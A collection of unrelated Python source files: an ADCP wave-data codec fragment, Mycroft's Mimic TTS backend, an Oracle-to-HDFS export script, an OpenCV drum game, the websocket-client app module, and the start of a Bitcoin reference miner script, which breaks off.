ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'whs'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(whs) # WHS Values
return ba
def process_wah(self, wah, num_4beam_ens):
"""
Average height data.
Average of all Range Tracking.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WAH = 7.3, 7.2, 7.5
:param wah: Average Range Tracking data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wah'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wah) # WAH Values
return ba
def process_wr0(self, wr0, num_4beam_ens):
"""
Range Tracking Beam 0 data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WR0 = 7.3, 7.2, 7.5
:param wr0: Range Tracking Beam 0 data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wr0'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wr0) # WR0 Values
return ba
def process_wr1(self, wr1, num_4beam_ens):
"""
Range Tracking Beam 1 data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WR1 = 7.3, 7.2, 7.5
:param wr1: Range Tracking Beam 1 data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wr1'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wr1) # WR1 Values
return ba
def process_wr2(self, wr2, num_4beam_ens):
"""
Range Tracking Beam 2 data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WR2 = 7.3, 7.2, 7.5
:param wr2: Range Tracking Beam 2 data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wr2'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wr2) # WR2 Values
return ba
def process_wr3(self, wr3, num_4beam_ens):
"""
Range Tracking Beam 3 data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WR0 = 7.3, 7.2, 7.5
:param wr3: Range Tracking Beam 3 data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wr3'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wr3) # WR3 Values
return ba
def process_wz0(self, wz0, num_vert_ens, num_selected_bins):
"""
Beam 0 Vertical Beam velocity data for each selected bin.
Data Type: Float
Rows: Number of Vertical values
Columns: Number of selected bins
WZ0 = 7.3, 7.2, 7.5
:param wz0: Beam 0 Vertical Beam velocity data in byte array for each selected bin.
:param num_vert_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_vert_ens)) # Rows - Number of Vertical ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wz0'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wz0) # WZ0 Values
return ba
def process_wzp(self, wzp, num_vert_ens):
"""
Vertical Beam Pressure data.
Data Type: Float
Rows: Number of Vertical values
Columns: 1
WZP = 7.3, 7.2, 7.5
:param wzp: Vertical Beam pressure data in byte array.
:param num_vert_ens: Number of vertical ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_vert_ens)) # Rows - Number of Vertical ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wzp'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wzp) # WZP Values
return ba
def process_wzr(self, wzr, num_vert_ens):
"""
Range Tracking Vertical Beam data.
Data Type: Float
Rows: Number of Vertical Beam values
Columns: 1
WZR = 7.3, 7.2, 7.5
:param wzr: Range Tracking Vertical Beam data in byte array.
:param num_vert_ens: Number of Vertical beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_vert_ens)) # Rows - Number of Vertical ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wzr'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wzr) # WZR Values
return ba
@staticmethod
def time_stamp_seconds(ens):
"""
Calcualte the timestamp. This is the number of seconds for the given
date and time.
:param ens: Ensemble to get the timestamp.
:return: Timestamp in seconds.
"""
ts = 0.0
if ens.IsEnsembleData:
year = ens.EnsembleData.Year
month = ens.EnsembleData.Month
day = ens.EnsembleData.Day
hour = ens.EnsembleData.Hour
minute = ens.EnsembleData.Minute
second = ens.EnsembleData.Second
hsec = ens.EnsembleData.HSec
jdn = WaveForceCodec.julian_day_number(year, month, day)
ts = (24.0 * 3600.0 * jdn) + (3600.0 * hour) + (60.0 * minute) + second + (hsec / 100.0)
return ts
@staticmethod
def julian_day_number(year, month, day):
"""
Count the number of calendar days there are for the given
year, month and day.
:param year: Years.
:param month: Months.
:param day: Days.
:return: Number of days.
"""
a = (14 - month) / 12
y = year + 4800 - a
m = month - 12 * a - 3
return day + (153 * m + 2) / 5 + (365 * y) + y / 4 - y / 100 + y / 400 - 32045
|
mimic_tts.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Mimic TTS, a local TTS backend.
This Backend uses the mimic executable to render text into speech.
"""
import os
import os.path
from os.path import exists, join, expanduser
import stat
import subprocess
from threading import Thread
from time import sleep
from mycroft import MYCROFT_ROOT_PATH
from mycroft.api import DeviceApi
from mycroft.configuration import Configuration
from mycroft.util.download import download
from mycroft.util.log import LOG
from .tts import TTS, TTSValidator
def get_mimic_binary():
"""Find the mimic binary, either from config or from PATH.
Returns:
(str) path of mimic executable
"""
config = Configuration.get().get("tts", {}).get("mimic")
bin_ = config.get("path",
os.path.join(MYCROFT_ROOT_PATH, 'mimic', 'bin', 'mimic'))
if not os.path.isfile(bin_):
# Search for mimic on the path
import distutils.spawn
bin_ = distutils.spawn.find_executable("mimic")
return bin_
def get_subscriber_voices():
"""Get dict of mimic voices exclusive to subscribers.
Returns:
(dict) map of voices to custom Mimic executables.
"""
data_dir = expanduser(Configuration.get()['data_dir'])
return {'trinity': join(data_dir, 'voices/mimic_tn')}
def download_subscriber_voices(selected_voice):
"""Function to download all premium voices.
The function starts with the currently selected if applicable
"""
subscriber_voices = get_subscriber_voices()
def make_executable(dest):
"""Call back function to make the downloaded file executable."""
LOG.info('Make executable new voice binary executable')
# make executable
file_stat = os.stat(dest)
os.chmod(dest, file_stat.st_mode | stat.S_IEXEC)
# First download the selected voice if needed
voice_file = subscriber_voices.get(selected_voice)
if voice_file is not None and not exists(voice_file):
LOG.info('Voice doesn\'t exist, downloading')
url = DeviceApi().get_subscriber_voice_url(selected_voice)
# Check we got an url
if url:
dl_status = download(url, voice_file, make_executable)
# Wait for completion
while not dl_status.done:
sleep(1)
else:
LOG.debug('{} is not available for this architecture'
.format(selected_voice))
# Download the rest of the subsciber voices as needed
for voice in subscriber_voices:
voice_file = subscriber_voices[voice]
if not exists(voice_file):
url = DeviceApi().get_subscriber_voice_url(voice)
# Check we got an url
if url:
dl_status = download(url, voice_file, make_executable)
# Wait for completion
while not dl_status.done:
sleep(1)
else:
LOG.debug('{} is not available for this architecture'
.format(voice))
def parse_phonemes(phonemes):
"""Parse mimic phoneme string into a list of phone, duration pairs.
Arguments
phonemes (bytes): phoneme output from mimic
Returns:
(list) list of phoneme duration pairs
"""
phon_str = phonemes.decode()
pairs = phon_str.split(' ')
return [pair.split(':') for pair in pairs if ':' in pair]
class Mimic(TTS):
"""TTS interface for local mimic v1."""
def __init__(self, lang, config):
super(Mimic, self).__init__(
lang, config, MimicValidator(self), 'wav',
ssml_tags=["speak", "ssml", "phoneme", "voice", "audio", "prosody"]
)
self.default_binary = get_mimic_binary()
self.clear_cache()
# Download subscriber voices if needed
self.subscriber_voices = get_subscriber_voices()
self.is_subscriber = DeviceApi().is_subscriber
if self.is_subscriber:
trd = Thread(target=download_subscriber_voices, args=[self.voice])
trd.daemon = True
trd.start()
def modify_tag(self, tag):
"""Modify the SSML to suite Mimic."""
ssml_conversions = {
'x-slow': '0.4',
'slow': '0.7',
'medium': '1.0',
'high': '1.3',
'x-high': '1.6',
'speed': 'rate'
}
for key, value in ssml_conversions.items():
tag = tag.replace(key, value)
return tag
@property
def args(self):
"""Build mimic arguments."""
subscriber_voices = self.subscriber_voices
if (self.voice in subscriber_voices and
exists(subscriber_voices[self.voice]) and self.is_subscriber):
# Use subscriber voice
mimic_bin = subscriber_voices[self.voice]
voice = self.voice
elif self.voice in subscriber_voices:
# Premium voice but bin doesn't exist, use ap while downloading
mimic_bin = self.default_binary
voice = 'ap'
else:
# Normal case use normal binary and selected voice
mimic_bin = self.default_binary
voice = self.voice
args = [mimic_bin, '-voice', voice, '-psdur', '-ssml']
stretch = self.config.get('duration_stretch', None)
if stretch:
args += ['--setf', 'duration_stretch={}'.format(stretch)]
return args
def get_tts(self, sentence, wav_file):
"""Generate WAV and phonemes.
Args:
sentence (str): sentence to generate audio for
wav_file (str): output file
Returns:
tuple ((str) file location, (str) generated phonemes)
"""
phonemes = subprocess.check_output(self.args + ['-o', wav_file,
'-t', sentence])
return wav_file, parse_phonemes(phonemes)
def viseme(self, phoneme_pairs):
"""Convert phoneme string to visemes.
Args:
phoneme_pairs (list): Phoneme output from mimic
Returns:
(list) list of tuples of viseme and duration
"""
visemes = []
for phon, dur in phoneme_pairs:
visemes.append((VISIMES.get(phon, '4'), float(dur)))
return visemes
class MimicValidator(TTSValidator):
"""Validator class checking that Mimic can be used."""
def validate_lang(self):
"""Verify that the language is supported."""
# TODO: Verify version of mimic can handle the requested language
def validate_connection(self):
"""Check that Mimic executable is found and works."""
mimic_bin = get_mimic_binary()
try:
subprocess.call([mimic_bin, '--version'])
except Exception as err:
if mimic_bin:
LOG.error('Failed to find mimic at: {}'.format(mimic_bin))
else:
LOG.error('Mimic executable not found')
raise Exception(
'Mimic was not found. Run install-mimic.sh to install it.') \
from err
def get_tts_class(self):
"""Return the TTS class associated with the validator."""
return Mimic
# Mapping based on Jeffers phoneme to viseme map, seen in table 1 from:
# http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.221.6377&rep=rep1&type=pdf
#
# Mycroft unit visemes based on images found at:
# http://www.web3.lu/wp-content/uploads/2014/09/visemes.jpg
#
# Mapping was created partially based on the "12 mouth shapes visuals seen at:
# https://wolfpaulus.com/journal/software/lipsynchronization/
VISIMES = {
# /A group
'v': '5',
'f': '5',
# /B group
'uh': '2',
'w': '2',
'uw': '2',
'er': '2',
'r': '2',
'ow': '2',
# /C group
'b': '4',
'p': '4',
'm': '4',
# /D group
'aw': '1',
# /E group
'th': '3',
'dh': '3',
# /F group
'zh': '3',
'ch': '3',
'sh': '3',
'jh': '3',
# /G group
'oy': '6',
'ao': '6',
# /Hgroup
'z': '3',
's': '3',
# /I group
'ae': '0',
'eh': '0',
'ey': '0',
'ah': '0',
'ih': '0',
'y': '0',
'iy': '0',
'aa': '0',
'ay': '0',
'ax': '0',
'hh': '0',
# /J group
'n': '3',
't': '3',
'd': '3',
'l': '3',
# /K group
'g': '3',
'ng': '3',
'k': '3',
# blank mouth
'pau': '4',
}
|
main.py
|
import cx_Oracle as ora
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as parquet
import uuid
import threading as th
PARTS = 10
ARRSIZE = 2000
def get_min_max(pool, table, column):
conn = pool.acquire()
cursor = conn.cursor()
minmax = """select min(t.{}), max(t.{}) from (select * from {}) t"""
minmax = minmax.format(column, column, table)
cursor.execute(minmax)
x = cursor.fetchone()
cursor.close()
pool.release(conn)
return x
def get_data(pool, query):
conn = pool.acquire()
cursor = conn.cursor()
cursor.arraysize = ARRSIZE
df = pd.read_sql_query(con=conn, sql=query)
cursor.close()
pool.release(conn)
return df
def getCotas(min, max, parts):
cant = max - min
part = int(cant / parts)
ct = []
while min < max:
lmin = min
lmax = min + part
min = lmax + 1
ct.append([lmin, lmax])
ct[-1][1] = max
return ct
def getPart(pool, cota):
id = str(uuid.uuid4()) + '.parquet'
conn = pool.acquire()
cursor = conn.cursor()
cursor.arraysize = ARRSIZE
qry = "select * from tickets where violationprecinct between {} and {}".format(*cota)
df = get_data(pool, qry)
table = pa.Table.from_pandas(df=df)
fs = pa.hdfs.connect(host='hdp', port=9000, user='hdfs')
with fs.open('/user/hdfs/tickets.python/'+id, 'wb') as fw:
parquet.write_table(table=table, where=fw)
cursor.close()
pool.release(conn)
if __name__ == "__main__":
dsn = ora.makedsn(host='10.0.0.2', port='1521', service_name='FISCO.matinet')
pool = ora.SessionPool(user="SPARK_METASTORE", password="SPARK_METASTORE", dsn=dsn, min=PARTS, max=100, increment=1,
encoding="UTF-8", threaded=True, getmode=ora.SPOOL_ATTRVAL_WAIT)
min1, max1 = get_min_max(pool, 'tickets', 'violationprecinct')
print("min: " + str(min1))
print("max: " + str(max1))
cotas = getCotas(min1, max1, PARTS)
threads = list()
for cota in cotas:
threads.append(th.Thread(target=getPart, args=[pool, cota]))
for x in threads:
x.start()
for x in threads:
x.join()
pool.close()
|
Drum AR Stella.py
|
import cv2
import numpy as np
import time
import pyaudio
import wave
from array import array
from struct import pack
import os
import threading
import sys
from collections import deque
from imutils.video import VideoStream
import argparse
import imutils
##Sound
'''
def drumThreadCreator(file):
drumThread = threading.Thread(target = play, args = (file,))
drumThread.start()
'''
def play(file):
CHUNK = 1024 #measured in bytes
wf = wave.open(file, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
data = wf.readframes(CHUNK)
while len(data) > 0:
stream.write(data)
data = wf.readframes(CHUNK)
stream.stop_stream()
stream.close()
p.terminate()
drumSounds = ["Other/snare.wav", "Other/rack tom.wav", "Other/tom.wav",
"Other/kick.wav", "Other/closed hat.wav"]
drum1Thread = threading.Thread(target = play, args = (drumSounds[0],))
drum2Thread = threading.Thread(target = play, args = (drumSounds[1],))
drum3Thread = threading.Thread(target = play, args = (drumSounds[2],))
drum4Thread = threading.Thread(target = play, args = (drumSounds[3],))
drum5Thread = threading.Thread(target = play, args = (drumSounds[4],))
drumThreads = [drum1Thread, drum2Thread, drum3Thread, drum4Thread, drum5Thread]
## Main Video Code
'''
def playDrum(i):
if i == 0:
drumThreadCreator("Other/snare.wav")
elif i == 1:
drumThreadCreator("Other/rack tom.wav")
elif i == 2:
drumThreadCreator("Other/tom.wav")
elif i == 3:
drumThreadCreator("Other/kick.wav")
elif i == 4:
drumThreadCreator("Other/closed hat.wav")
'''
def getDrum(i):
color = (0,255,0)
lineWidth = 2
radius1, radius2, radius3, radius4 = 100, 120, 140, 100
point1, point2, point3, point4, point5 = (300,550), (580,500), (820,500), (1100,550), (150,300)
cir1 = (point1,radius2,color,lineWidth)
cir2 = (point2,radius1,color,lineWidth)
cir3 = (point3,radius1,color,lineWidth)
cir4 = (point4,radius3,color,lineWidth)
cir5 = (point5,radius4,color,lineWidth)
##Change based on System Mac or Windows
drumParas = [cir1,cir2,cir3,cir4,cir5]
return drumParas[i]
def main():
hRange = (550, 650)
splitRange = 320
drumNum = 5
threshold = (10,10,10)
def checkDrum(res, k):
point, radius, _, _ = getDrum(k)
counter = False
for line in range(point[1] - radius//2, point[1] + (radius*2//3), 20):
for char in range(point[0] - radius//2, point[0] + radius//2, 20):
for i in range(3):
if res[line][char][i] >= threshold[i]:
counter = True
return counter
#range of color
#colorLower = np.array([0, 50, 0], np.uint8)
#colorUpper = np.array([45, 100, 100], np.uint8)
colorLower = np.array([0, 120, 70], np.uint8)
colorUpper = np.array([10, 255, 255], np.uint8)
colorLower1 = np.array([170, 120, 70], np.uint8)
colorUpper1 = np.array([180, 255, 255], np.uint8)
kernal = np.ones((5,5), 'uint8')
drums = [0] * drumNum
inDrums = [False] * drumNum
cap = cv2.VideoCapture(0)
time.sleep(2.0)
drumStatus = [0] * drumNum
while(True):
for i in range(len(drums)):
if drums[i] > 0:
drums[i] -= 1
ret, frame = cap.read()
frame = cv2.resize(frame, (0,0), fx = 2, fy = 2)
#print(len(frame), len(frame[0])) #1440, 2560, 720, 1280
frame = cv2.flip(frame, +1)
blurred = cv2.GaussianBlur(frame, (11,11), 0)
frameHSV = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
frameHSV = cv2.erode(frameHSV, kernal, iterations = 5)
frameHSV = cv2.dilate(frameHSV, kernal, iterations = 5)
cv2.imshow("hsv", frameHSV)
colorMask0 = cv2.inRange(frameHSV, colorLower, colorUpper)
colorMask1 = cv2.inRange(frameHSV, colorLower1, colorUpper1)
colorMask = colorMask0 + colorMask1
res = cv2.bitwise_and(frame, frame, mask = colorMask)
cv2.imshow("Before",res)
gray = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)
cv2.imshow("After", res)
thresh = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
count = 0
for i in contours:
count += 1
((x,y), radius) = cv2.minEnclosingCircle(i)
if radius < 20:
continue
M = cv2.moments(i)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
cv2.circle(frame, (int(x), int(y)), int(radius), (0, 0, 255), 2)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
for i in range(len(drums)):
timer = drums[i]
point, radius, color, lineWidth = getDrum(i)
cv2.circle(frame,point,radius,color,lineWidth)
if timer == 0:
isHit = checkDrum(res, i)
if isHit == True and inDrums[i] == False:
drumStatus[i] = 1
cv2.circle(frame,point,radius,color,-1)
drums[i] = 5
inDrums[i] = True
else:
inDrums[i] = False
for i in range(len(drumStatus)):
if drumStatus[i] == 1:
drumThreads[i].start()
drumStatus[i] = 0
cv2.imshow("Hello", res)
cv2.imshow("Drum AR", frame)
#if condition is met, break out of loop
ch = cv2.waitKey(1)
if ch & 0xFF == ord('q'):
break
cap.release
cv2.destroyAllWindows()
main()
## Tkinter
|
_app.py
|
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
"""
WebSocketApp provides higher level APIs.
"""
import inspect
import select
import sys
import threading
import time
import traceback
import six
from ._abnf import ABNF
from ._core import WebSocket, getdefaulttimeout
from ._exceptions import *
from . import _logging
__all__ = ["WebSocketApp"]
class Dispatcher:
def __init__(self, app, ping_timeout):
self.app = app
self.ping_timeout = ping_timeout
def read(self, sock, read_callback, check_callback):
while self.app.keep_running:
r, w, e = select.select(
(self.app.sock.sock, ), (), (), self.ping_timeout)
if r:
if not read_callback():
break
check_callback()
class SSLDispatcher:
def __init__(self, app, ping_timeout):
self.app = app
self.ping_timeout = ping_timeout
def read(self, sock, read_callback, check_callback):
while self.app.keep_running:
r = self.select()
if r:
if not read_callback():
break
check_callback()
def select(self):
sock = self.app.sock.sock
if sock.pending():
return [sock,]
r, w, e = select.select((sock, ), (), (), self.ping_timeout)
return r
class WebSocketApp(object):
"""
Higher level of APIs are provided.
The interface is like JavaScript WebSocket object.
"""
def __init__(self, url, header=None,
on_open=None, on_message=None, on_error=None,
on_close=None, on_ping=None, on_pong=None,
on_cont_message=None,
keep_running=True, get_mask_key=None, cookie=None,
subprotocols=None,
on_data=None):
"""
url: websocket url.
header: custom header for websocket handshake.
on_open: callable object which is called at opening websocket.
this function has one argument. The argument is this class object.
on_message: callable object which is called when received data.
on_message has 2 arguments.
The 1st argument is this class object.
The 2nd argument is utf-8 string which we get from the server.
on_error: callable object which is called when we get error.
on_error has 2 arguments.
The 1st argument is this class object.
The 2nd argument is exception object.
on_close: callable object which is called when closed the connection.
this function has one argument. The argument is this class object.
on_cont_message: callback object which is called when receive continued
frame data.
on_cont_message has 3 arguments.
The 1st argument is this class object.
The 2nd argument is utf-8 string which we get from the server.
The 3rd argument is continue flag. if 0, the data continue
to next frame data
on_data: callback object which is called when a message received.
This is called before on_message or on_cont_message,
and then on_message or on_cont_message is called.
on_data has 4 argument.
The 1st argument is this class object.
The 2nd argument is utf-8 string which we get from the server.
The 3rd argument is data type. ABNF.OPCODE_TEXT or ABNF.OPCODE_BINARY will be came.
The 4th argument is continue flag. if 0, the data continue
keep_running: this parameter is obsolete and ignored.
get_mask_key: a callable to produce new mask keys,
see the WebSocket.set_mask_key's docstring for more information
subprotocols: array of available sub protocols. default is None.
"""
self.url = url
self.header = header if header is not None else []
self.cookie = cookie
self.on_open = on_open
self.on_message = on_message
self.on_data = on_data
self.on_error = on_error
self.on_close = on_close
self.on_ping = on_ping
self.on_pong = on_pong
self.on_cont_message = on_cont_message
self.keep_running = False
self.get_mask_key = get_mask_key
self.sock = None
self.last_ping_tm = 0
self.last_pong_tm = 0
self.subprotocols = subprotocols
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT,
data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if not self.sock or self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException(
"Connection is already closed.")
def close(self, **kwargs):
"""
close websocket connection.
"""
self.keep_running = False
if self.sock:
self.sock.close(**kwargs)
self.sock = None
def _send_ping(self, interval, event):
while not event.wait(interval):
self.last_ping_tm = time.time()
if self.sock:
try:
self.sock.ping()
except Exception as ex:
_logging.warning("send_ping routine terminated: {}".format(ex))
break
def run_forever(self, sockopt=None, sslopt=None,
ping_interval=0, ping_timeout=None,
http_proxy_host=None, http_proxy_port=None,
http_no_proxy=None, http_proxy_auth=None,
skip_utf8_validation=False,
host=None, origin=None, dispatcher=None,
suppress_origin=False, proxy_type=None):
"""
run event loop for WebSocket framework.
This loop is infinite loop and is alive during websocket is available.
sockopt: values for socket.setsockopt.
sockopt must be tuple
and each element is argument of sock.setsockopt.
sslopt: ssl socket optional dict.
ping_interval: automatically send "ping" command
every specified period(second)
if set to 0, not send automatically.
ping_timeout: timeout(second) if the pong message is not received.
http_proxy_host: http proxy host name.
http_proxy_port: http proxy port. If not set, set to 80.
http_no_proxy: host names, which doesn't use proxy.
skip_utf8_validation: skip utf8 validation.
host: update host header.
origin: update origin header.
dispatcher: customize reading data from socket.
suppress_origin: suppress outputting origin header.
Returns
-------
False if caught KeyboardInterrupt
True if other exception was raised during a loop
"""
if ping_timeout is not None and ping_timeout <= 0:
ping_timeout = None
if ping_timeout and ping_interval and ping_interval <= ping_timeout:
raise WebSocketException("Ensure ping_interval > ping_timeout")
if not sockopt:
sockopt = []
if not sslopt:
sslopt = {}
if self.sock:
raise WebSocketException("socket is already opened")
thread = None
self.keep_running = True
self.last_ping_tm = 0
self.last_pong_tm = 0
def teardown(close_frame=None):
"""
Tears down the connection.
If close_frame is set, we will invoke the on_close handler with the
statusCode and reason from there.
"""
if thread and thread.is_alive():
event.set()
thread.join()
self.keep_running = False
if self.sock:
self.sock.close()
close_args = self._get_close_args(
close_frame.data if close_frame else None)
self._callback(self.on_close, *close_args)
self.sock = None
try:
self.sock = WebSocket(
self.get_mask_key, sockopt=sockopt, sslopt=sslopt,
fire_cont_frame=self.on_cont_message is not None,
skip_utf8_validation=skip_utf8_validation,
enable_multithread=True if ping_interval else False)
self.sock.settimeout(getdefaulttimeout())
self.sock.connect(
self.url, header=self.header, cookie=self.cookie,
http_proxy_host=http_proxy_host,
http_proxy_port=http_proxy_port, http_no_proxy=http_no_proxy,
http_proxy_auth=http_proxy_auth, subprotocols=self.subprotocols,
host=host, origin=origin, suppress_origin=suppress_origin,
proxy_type=proxy_type)
if not dispatcher:
dispatcher = self.create_dispatcher(ping_timeout)
self._callback(self.on_open)
if ping_interval:
event = threading.Event()
thread = threading.Thread(
target=self._send_ping, args=(ping_interval, event))
thread.setDaemon(True)
thread.start()
def read():
if not self.keep_running:
return teardown()
op_code, frame = self.sock.recv_data_frame(True)
if op_code == ABNF.OPCODE_CLOSE:
return teardown(frame)
elif op_code == ABNF.OPCODE_PING:
self._callback(self.on_ping, frame.data)
elif op_code == ABNF.OPCODE_PONG:
self.last_pong_tm = time.time()
self._callback(self.on_pong, frame.data)
elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
self._callback(self.on_data, frame.data,
frame.opcode, frame.fin)
self._callback(self.on_cont_message,
frame.data, frame.fin)
else:
data = frame.data
if six.PY3 and op_code == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
self._callback(self.on_data, data, frame.opcode, True)
self._callback(self.on_message, data)
return True
def check():
if (ping_timeout):
has_timeout_expired = time.time() - self.last_ping_tm > ping_timeout
has_pong_not_arrived_after_last_ping = self.last_pong_tm - self.last_ping_tm < 0
has_pong_arrived_too_late = self.last_pong_tm - self.last_ping_tm > ping_timeout
if (self.last_ping_tm
and has_timeout_expired
and (has_pong_not_arrived_after_last_ping or has_pong_arrived_too_late)):
raise WebSocketTimeoutException("ping/pong timed out")
return True
dispatcher.read(self.sock.sock, read, check)
except (Exception, KeyboardInterrupt, SystemExit) as e:
self._callback(self.on_error, e)
if isinstance(e, SystemExit):
# propagate SystemExit further
raise
teardown()
return not isinstance(e, KeyboardInterrupt)
def create_dispatcher(self, ping_timeout):
timeout = ping_timeout or 10
if self.sock.is_ssl():
return SSLDispatcher(self, timeout)
return Dispatcher(self, timeout)
def _get_close_args(self, data):
""" this functions extracts the code, reason from the close body
if they exists, and if the self.on_close except three arguments """
# if the on_close callback is "old", just return empty list
if sys.version_info < (3, 0):
if not self.on_close or len(inspect.getargspec(self.on_close).args) != 3:
return []
else:
if not self.on_close or len(inspect.getfullargspec(self.on_close).args) != 3:
return []
if data and len(data) >= 2:
code = 256 * six.byte2int(data[0:1]) + six.byte2int(data[1:2])
reason = data[2:].decode('utf-8')
return [code, reason]
return [None, None]
def _callback(self, callback, *args):
if callback:
try:
if inspect.ismethod(callback):
callback(*args)
else:
callback(self, *args)
except Exception as e:
_logging.error("error from callback {}: {}".format(callback, e))
if _logging.isEnabledForDebug():
_, _, tb = sys.exc_info()
traceback.print_tb(tb)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
